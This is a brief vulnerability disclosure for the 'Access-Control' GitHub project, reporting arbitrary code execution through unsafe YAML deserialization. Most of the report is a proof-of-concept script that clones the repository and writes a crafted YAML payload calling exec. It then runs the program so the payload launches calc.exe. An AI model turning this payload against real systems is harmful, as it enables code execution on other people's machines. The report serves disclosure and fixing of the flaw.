Access-Control
package is vulnerable to Arbitary Code Execution
due to insecure yaml desearilization.
Vulnerable to YAML deserialization attack caused by unsafe loading.
steps to reproduce:
import os
os.system('git clone https://github.com/DimoDimchev/Access-Control')
os.chdir('Access-Control/')
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('calc.exe')"
"""
open('data/data.yaml','w+').write(payload)
os.system("python3 src/main.py")
python3 exploit.py
Arbitary Code Execution